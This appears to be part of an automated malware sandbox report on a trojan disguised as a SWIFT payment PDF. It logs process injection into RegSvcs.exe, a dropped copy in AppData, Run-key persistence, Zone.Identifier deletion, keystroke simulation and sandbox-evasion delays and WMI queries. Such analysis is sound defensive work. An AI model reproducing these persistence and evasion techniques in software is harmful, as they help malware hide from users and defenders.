              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040BB97 push dword ptr [ecx-75h]; iretd 1_2_0040BBA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0279475D push ebp; retf 1_2_02794760
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02794F5E push esp; ret 1_2_02794F61
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_027943A9 push es; iretd 1_2_027943AF
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'W7hM5Qw6aBqBR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'W7hM5Qw6aBqBR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'W7hM5Qw6aBqBR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'W7hM5Qw6aBqBR', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004440780_2_00444078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeAPI/Special instruction interceptor: Address: 3F246FC
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: C50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 48A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3300000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597483Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596045Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595827Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595715Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595171Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1764Jump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeAPI coverage: 3.3 %
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 3332Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 1800Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
